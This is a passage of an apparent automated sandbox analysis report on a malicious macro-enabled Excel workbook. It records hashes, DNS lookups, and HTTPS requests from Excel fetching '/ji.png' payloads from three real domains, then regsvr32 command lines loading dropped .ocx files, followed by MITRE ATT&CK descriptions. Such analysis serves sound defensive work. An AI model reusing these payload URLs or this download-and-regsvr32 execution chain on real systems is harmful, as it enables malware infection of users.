Preview:	[folders]..Templates.LNK=0..UT-1759246356.LNK=0..[misc]..UT-1759246356.LNK=0..

C:\Users\user\Downloads\vTlVWujWHA\~$UT-1759246356.xlsb Download File
Process:	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.6081032063576088
Encrypted:	false
SSDEEP:	3:6BYba+ff/:XaOf/
MD5:	6601D08D96EABD4D8F59A2AEF3A40C4B
SHA1:	B1621AFEA3B755364602CC7F44F0AD8FEDB71C3B
SHA-256:	5BC9538DBD10DB8BD8F1BB994024C2A2EF665D6DCB92369F059955737634F3DE
SHA-512:	A1C10CBF410DBDE2F4701B400CA6075A9BA4C04EAD76E477CDC569FD9EF80340B275B6F1D38CD387ED33BDF51EA7381ADC13DB26D9AB915523B6F8AFA7D6FAE3
Malicious:	false
Preview:	.user ..a.l.f.r.e.d.o. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Static File Info

General
File type:	Microsoft Excel 2007+
Entropy (8bit):	7.75586012796007
TrID:	Excel Microsoft Office Open XML Format document with Macro (51004/1) 36.56% Microsoft Excel Office Binary workbook document (40504/1) 29.03% Excel Microsoft Office Open XML Format document (40004/1) 28.67% ZIP compressed archive (8000/1) 5.73%
File name:	UT-1759246356.xlsb
File size:	138856
MD5:	120135bf5c8cfd817edbb84c181387a3
SHA1:	ae9b40d408165e279ef0034ed368be57f4b38291
SHA256:	73218eae799db142a512b9153fe938324cda2dca60ff0d4c8d7b131bf858b799
SHA512:	c3fe698d7a8932a70ffd175a2d2873a2d734893c7a2fb2d14cdb0893d7a51ea740af5dd87ac4cf7c2805e220b5617e49c546f5707ab8f3bc2f613d11a76b67ba
SSDEEP:	3072:2GowZK/FGOztQNL0cBLJUq1dJZvPpz7+fp7KG:8wQ/0OzSNLJNUydJZvPZC1KG
File Content Preview:	PK..........!...(.............[Content_Types].xml ...(.........................................................................................................................................................................................................

Network Behavior

Download Network PCAP: filtered – full

Network Port Distribution

Total Packets: 25
• 443 (HTTPS)
• 53 (DNS)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 16, 2021 13:59:16.039726973 CET	49869	443	192.168.2.3	192.185.209.37
Dec 16, 2021 13:59:16.039793968 CET	443	49869	192.185.209.37	192.168.2.3
Dec 16, 2021 13:59:16.039902925 CET	49869	443	192.168.2.3	192.185.209.37
Dec 16, 2021 13:59:16.041452885 CET	49869	443	192.168.2.3	192.185.209.37
Dec 16, 2021 13:59:16.041481018 CET	443	49869	192.185.209.37	192.168.2.3
Dec 16, 2021 13:59:16.352547884 CET	443	49869	192.185.209.37	192.168.2.3
Dec 16, 2021 13:59:16.352731943 CET	49869	443	192.168.2.3	192.185.209.37
Dec 16, 2021 13:59:16.369441986 CET	49869	443	192.168.2.3	192.185.209.37
Dec 16, 2021 13:59:16.369491100 CET	443	49869	192.185.209.37	192.168.2.3
Dec 16, 2021 13:59:16.369802952 CET	443	49869	192.185.209.37	192.168.2.3
Dec 16, 2021 13:59:16.369874954 CET	49869	443	192.168.2.3	192.185.209.37
Dec 16, 2021 13:59:16.370835066 CET	49869	443	192.168.2.3	192.185.209.37
Dec 16, 2021 13:59:16.412269115 CET	443	49869	192.185.209.37	192.168.2.3
Dec 16, 2021 13:59:17.631239891 CET	443	49869	192.185.209.37	192.168.2.3
Dec 16, 2021 13:59:17.631371975 CET	443	49869	192.185.209.37	192.168.2.3
Dec 16, 2021 13:59:17.631534100 CET	49869	443	192.168.2.3	192.185.209.37
Dec 16, 2021 13:59:17.632599115 CET	49869	443	192.168.2.3	192.185.209.37
Dec 16, 2021 13:59:17.632637024 CET	49869	443	192.168.2.3	192.185.209.37
Dec 16, 2021 13:59:17.632672071 CET	443	49869	192.185.209.37	192.168.2.3
Dec 16, 2021 13:59:17.632689953 CET	49869	443	192.168.2.3	192.185.209.37
Dec 16, 2021 13:59:17.632772923 CET	49869	443	192.168.2.3	192.185.209.37
Dec 16, 2021 13:59:17.967149973 CET	49871	443	192.168.2.3	128.204.218.95
Dec 16, 2021 13:59:17.967207909 CET	443	49871	128.204.218.95	192.168.2.3
Dec 16, 2021 13:59:17.967336893 CET	49871	443	192.168.2.3	128.204.218.95
Dec 16, 2021 13:59:17.968262911 CET	49871	443	192.168.2.3	128.204.218.95
Dec 16, 2021 13:59:17.968290091 CET	443	49871	128.204.218.95	192.168.2.3
Dec 16, 2021 13:59:18.059830904 CET	443	49871	128.204.218.95	192.168.2.3
Dec 16, 2021 13:59:18.060009956 CET	49871	443	192.168.2.3	128.204.218.95
Dec 16, 2021 13:59:18.066284895 CET	49871	443	192.168.2.3	128.204.218.95
Dec 16, 2021 13:59:18.066304922 CET	443	49871	128.204.218.95	192.168.2.3
Dec 16, 2021 13:59:18.066612959 CET	443	49871	128.204.218.95	192.168.2.3
Dec 16, 2021 13:59:18.066730976 CET	49871	443	192.168.2.3	128.204.218.95
Dec 16, 2021 13:59:18.067634106 CET	49871	443	192.168.2.3	128.204.218.95
Dec 16, 2021 13:59:18.108200073 CET	443	49871	128.204.218.95	192.168.2.3
Dec 16, 2021 13:59:18.444503069 CET	443	49871	128.204.218.95	192.168.2.3
Dec 16, 2021 13:59:18.444602966 CET	443	49871	128.204.218.95	192.168.2.3
Dec 16, 2021 13:59:18.444642067 CET	49871	443	192.168.2.3	128.204.218.95
Dec 16, 2021 13:59:18.444768906 CET	49871	443	192.168.2.3	128.204.218.95
Dec 16, 2021 13:59:18.444940090 CET	49871	443	192.168.2.3	128.204.218.95
Dec 16, 2021 13:59:18.444967985 CET	443	49871	128.204.218.95	192.168.2.3
Dec 16, 2021 13:59:18.445003033 CET	49871	443	192.168.2.3	128.204.218.95
Dec 16, 2021 13:59:18.445085049 CET	49871	443	192.168.2.3	128.204.218.95
Dec 16, 2021 13:59:19.103607893 CET	49875	443	192.168.2.3	162.241.203.226
Dec 16, 2021 13:59:19.103637934 CET	443	49875	162.241.203.226	192.168.2.3
Dec 16, 2021 13:59:19.103763103 CET	49875	443	192.168.2.3	162.241.203.226
Dec 16, 2021 13:59:19.104629040 CET	49875	443	192.168.2.3	162.241.203.226
Dec 16, 2021 13:59:19.104655981 CET	443	49875	162.241.203.226	192.168.2.3
Dec 16, 2021 13:59:19.403893948 CET	443	49875	162.241.203.226	192.168.2.3
Dec 16, 2021 13:59:19.404031992 CET	49875	443	192.168.2.3	162.241.203.226
Dec 16, 2021 13:59:19.411185026 CET	49875	443	192.168.2.3	162.241.203.226
Dec 16, 2021 13:59:19.411205053 CET	443	49875	162.241.203.226	192.168.2.3
Dec 16, 2021 13:59:19.411721945 CET	443	49875	162.241.203.226	192.168.2.3
Dec 16, 2021 13:59:19.411818027 CET	49875	443	192.168.2.3	162.241.203.226
Dec 16, 2021 13:59:19.412652016 CET	49875	443	192.168.2.3	162.241.203.226
Dec 16, 2021 13:59:19.456226110 CET	443	49875	162.241.203.226	192.168.2.3
Dec 16, 2021 13:59:20.834964991 CET	443	49875	162.241.203.226	192.168.2.3
Dec 16, 2021 13:59:20.835086107 CET	443	49875	162.241.203.226	192.168.2.3
Dec 16, 2021 13:59:20.835114956 CET	49875	443	192.168.2.3	162.241.203.226
Dec 16, 2021 13:59:20.835180998 CET	49875	443	192.168.2.3	162.241.203.226
Dec 16, 2021 13:59:20.836544037 CET	49875	443	192.168.2.3	162.241.203.226
Dec 16, 2021 13:59:20.836575031 CET	443	49875	162.241.203.226	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 16, 2021 13:59:15.707930088 CET	53942	53	192.168.2.3	1.1.1.1
Dec 16, 2021 13:59:16.036312103 CET	53	53942	1.1.1.1	192.168.2.3
Dec 16, 2021 13:59:17.858164072 CET	54338	53	192.168.2.3	1.1.1.1
Dec 16, 2021 13:59:17.961780071 CET	53	54338	1.1.1.1	192.168.2.3
Dec 16, 2021 13:59:18.459249973 CET	50235	53	192.168.2.3	1.1.1.1
Dec 16, 2021 13:59:19.101340055 CET	53	50235	1.1.1.1	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Dec 16, 2021 13:59:15.707930088 CET	192.168.2.3	1.1.1.1	0xbfaa	Standard query (0)	trzgestao.com.br	A (IP address)	IN (0x0001)
Dec 16, 2021 13:59:17.858164072 CET	192.168.2.3	1.1.1.1	0xe060	Standard query (0)	keylessguard.com	A (IP address)	IN (0x0001)
Dec 16, 2021 13:59:18.459249973 CET	192.168.2.3	1.1.1.1	0x7365	Standard query (0)	as4estacoes.pt	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Dec 16, 2021 13:59:16.036312103 CET	1.1.1.1	192.168.2.3	0xbfaa	No error (0)	trzgestao.com.br	192.185.209.37	A (IP address)	IN (0x0001)
Dec 16, 2021 13:59:17.961780071 CET	1.1.1.1	192.168.2.3	0xe060	No error (0)	keylessguard.com	128.204.218.95	A (IP address)	IN (0x0001)
Dec 16, 2021 13:59:19.101340055 CET	1.1.1.1	192.168.2.3	0x7365	No error (0)	as4estacoes.pt	162.241.203.226	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

trzgestao.com.br

keylessguard.com

as4estacoes.pt

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49869	192.185.209.37	443	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
2021-12-16 12:59:16 UTC	0	OUT	GET /NyHJnMatYpPH/ji.png HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: trzgestao.com.br Connection: Keep-Alive
2021-12-16 12:59:17 UTC	0	IN	HTTP/1.1 200 OK Date: Thu, 16 Dec 2021 12:59:16 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49871	128.204.218.95	443	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
2021-12-16 12:59:18 UTC	0	OUT	GET /LXA6P0x2h9ES/ji.png HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: keylessguard.com Connection: Keep-Alive
2021-12-16 12:59:18 UTC	0	IN	HTTP/1.1 200 OK Connection: close x-powered-by: PHP/7.4.26 content-type: text/html; charset=UTF-8 content-length: 0 date: Thu, 16 Dec 2021 12:59:18 GMT server: LiteSpeed vary: User-Agent alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49875	162.241.203.226	443	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
2021-12-16 12:59:19 UTC	0	OUT	GET /4N0w2l0mqZ/ji.png HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: as4estacoes.pt Connection: Keep-Alive
2021-12-16 12:59:20 UTC	1	IN	HTTP/1.1 200 OK Date: Thu, 16 Dec 2021 12:59:19 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Accept-Ranges: none Vary: User-Agent X-Generated: t=1639659559596164 Content-Length: 0 Content-Type: text/html; charset=UTF-8

Code Manipulations

Statistics

CPU Usage

• EXCEL.EXE
• regsvr32.exe
• regsvr32.exe
• regsvr32.exe

Click to jump to process

Memory Usage

• EXCEL.EXE
• regsvr32.exe
• regsvr32.exe
• regsvr32.exe

Click to jump to process

High Level Behavior Distribution

• File
• Registry

Click to dive into process behavior distribution

Behavior

• EXCEL.EXE
• regsvr32.exe
• regsvr32.exe
• regsvr32.exe

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 3436 Parent PID: 3676

Function Logs

General

Start time:	13:59:11
Start date:	16/12/2021
Path:	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Downloads\vTlVWujWHA\UT-1759246356.xlsb
Imagebase:	0x7ff764e30000
File size:	64367408 bytes
MD5 hash:	23CAD504B3E04BB54CD636AD2874041A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Section Activities

Sections loaded by Windows

Sections loaded by Program

Show Windows behavior

Registry Activities

Show Windows behavior

COM Activities

WMI Operations

Show Windows behavior

Mutex Activities

Show Windows behavior

Process Activities

Process Information Set

Show Windows behavior

Thread Activities

Thread Created

Thread Information Set

Show Windows behavior

Memory Activities

Memory Usage Statistics

Show Windows behavior

System Activities

Language or Locale ID Queried

LPC Port Activities

Chronological Activities

Analysis Process: regsvr32.exe PID: 4356 Parent PID: 3436

Function Logs

General

Start time:	13:59:20
Start date:	16/12/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\regsvr32.exe" C:\Jambo\muh1.ocx
Imagebase:	0x7ff781a70000
File size:	24064 bytes
MD5 hash:	578BAB56836A3FE455FFC7883041825B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

File Activities

Show Windows behavior

Section Activities

Sections loaded by Windows

Sections loaded by Program

Show Windows behavior

Registry Activities

Key Opened

Key Value Queried

Show Windows behavior

Mutex Activities

Show Windows behavior

Process Activities

Process Information Set

Show Windows behavior

Memory Activities

Memory Protection Changed

Memory Usage Statistics

Show Windows behavior

System Activities

Show Windows behavior

Timing Activities

Show Windows behavior

Windows UI Activities

Window UI Enumerated

Show Windows behavior

LPC Port Activities

Chronological Activities

Analysis Process: regsvr32.exe PID: 1560 Parent PID: 3436

Function Logs

General

Start time:	13:59:20
Start date:	16/12/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\regsvr32.exe" C:\Jambo\muh2.ocx
Imagebase:	0x7ff781a70000
File size:	24064 bytes
MD5 hash:	578BAB56836A3FE455FFC7883041825B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

File Activities

Show Windows behavior

Section Activities

Sections loaded by Windows

Sections loaded by Program

Show Windows behavior

Registry Activities

Key Opened

Key Value Queried

Show Windows behavior

Mutex Activities

Show Windows behavior

Process Activities

Process Information Set

Show Windows behavior

Memory Activities

Memory Protection Changed

Memory Usage Statistics

Show Windows behavior

System Activities

Show Windows behavior

Timing Activities

Show Windows behavior

Windows UI Activities

Window UI Enumerated

Show Windows behavior

LPC Port Activities

Chronological Activities

Analysis Process: regsvr32.exe PID: 5812 Parent PID: 3436

Function Logs

General

Start time:	13:59:21
Start date:	16/12/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\regsvr32.exe" C:\Jambo\muh3.ocx
Imagebase:	0x7ff781a70000
File size:	24064 bytes
MD5 hash:	578BAB56836A3FE455FFC7883041825B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

File Activities

Show Windows behavior

Section Activities

Sections loaded by Windows

Sections loaded by Program

Show Windows behavior

Registry Activities

Key Opened

Key Value Queried

Show Windows behavior

Mutex Activities

Show Windows behavior

Process Activities

Process Information Set

Show Windows behavior

Memory Activities

Memory Protection Changed

Memory Usage Statistics

Show Windows behavior

System Activities

Show Windows behavior

Timing Activities

Show Windows behavior

Windows UI Activities

Window UI Enumerated

Show Windows behavior

LPC Port Activities

Chronological Activities

Disassembly

Code Analysis

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report UT-1759246356.xlsb

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Initial Sample

Sigma Overview

System Summary:

Jbx Signature Overview

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Hooking and other Techniques for Hiding and Protection:

HIPS / PFW / Operating System Protection Evasion:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: EXCEL.EXE PID: 3436 Parent PID: 3676

General

File Activities

File Opened

File Created

File Written

File Read

File Attributes Queried

Directory Queried